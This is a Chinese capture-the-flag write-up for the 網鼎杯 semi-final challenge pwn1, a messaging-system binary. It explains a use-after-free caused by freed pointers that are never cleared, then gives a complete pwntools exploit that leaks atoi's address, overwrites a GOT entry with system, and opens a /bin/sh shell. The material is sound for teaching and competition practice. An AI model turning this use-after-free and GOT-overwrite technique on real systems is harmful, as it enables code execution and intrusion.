一個短信系統(tǒng)

• 定義了兩個結(jié)構(gòu)體,分別如下,一個是用戶信息的結(jié)構(gòu)體,一個是信息結(jié)構(gòu)體

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

00000000 00000000 message struc ; (sizeof=0x18, align=0x8, mappedto_6) 00000000 title dq ? ; offset 00000008 content dq ? 00000010 next dq ? 00000018 message ends 00000018 00000000 ; --------------------------------------------------------------------------- 00000000 00000000 pwn struc ; (sizeof=0x128, align=0x8, mappedto_7) 00000000 malloc_name_ptr dq ? 00000008 age dq ? 00000010 description db 256 dup(?) 00000110 messagenode dq ? ; offset 00000118 friend_ptr dq ? 00000120 inuse dq ? 00000128 pwn ends 00000128

• 程序邏輯有一些復(fù)雜,但是有幾個關(guān)鍵的地方值得注意一下
• 人物信息結(jié)構(gòu)體中有許多指針,而且排布相對穩(wěn)定
• 程序只有兩處地方調(diào)用了free函數(shù),并且未置空指針,這就導(dǎo)致了UAF的存在

• 還有strdup函數(shù),第一次見,作用不是很清楚,去查了一下才知道它的作用和malloc后scanf是一樣的

• 程序中有大量的鏈表指針操作,顯得非常復(fù)雜,但是不用太過于糾結(jié),在我嘗試了一下執(zhí)行free后,人物信息結(jié)構(gòu)體被free掉了,這就導(dǎo)致了有0x130的空間可以被利用

• 期間我嘗試了利用strdup來進行堆塊錯位的操作,但是并沒有成功,因為p64()函數(shù)自動補的0影響了strdup的過程,而唯一比較容易的可控的地方是nameptr,只要覆蓋了name指針內(nèi)容,show后再進行updata,就可以leak程序基址修改程序的got表
• 這里我free了兩塊大堆塊,導(dǎo)致了我有0x260的空間可以使用,然后我就可以利用剛才的strdup,來進行指針的覆蓋

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67

from pwn import *r = process("./pwn") atoi_libc = 0x36E80 #offset sys_libc = 0x45390def register(namesize,name):r.sendlineafter("Your choice:","2")r.sendlineafter("Input your name size:",str(namesize))r.sendafter("Input your name:",name)r.sendlineafter("Input your age:","18")r.sendlineafter("Input your description:","1"*0x100)def login(name):r.sendlineafter("Your choice:","1")r.sendafter("Please input your user name:",name)def show():r.sendlineafter("Your choice:","1")def edit(name,age):r.sendlineafter("Your choice:","2")r.sendafter("Input your name:",name)r.sendlineafter("Input your age:","18")r.sendlineafter("Input your description:","1"*0x100)def AddDeleFriend(module,name):r.sendlineafter("Your choice:","3")r.sendafter("Input the friend's name:",name)r.sendlineafter("So..Do u want to add or delete this friend?(a/d)",module)def message(name,content,title):r.sendlineafter("Your choice:","4")r.sendafter("Which user do you want to send a msg to:",name)r.sendlineafter("Input your message title:",title)r.sendlineafter("Input your content:",content)def logout():r.sendlineafter("Your choice:","6")def exp():register(0x80,"111111")register(0x80,"222222")login("111111")AddDeleFriend("a","111111")AddDeleFriend("d","111111")logout()login("222222")AddDeleFriend("a","222222")AddDeleFriend("d","222222")payload = '\x30'*16*15payload += p64(0x602060)message("222222",payload,"title")show()r.recvuntil("Username:")atoi = u64(r.recv(6) +'\x00'*2)print "atoi :%x"%atoisystem=atoi-atoi_libc + sys_libcedit(p64(system),18)r.sendline("/bin/sh")r.interactive()if __name__ == "__main__":exp()

總結(jié)

以上是生活随笔為你收集整理的网鼎杯半决赛 pwn1的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。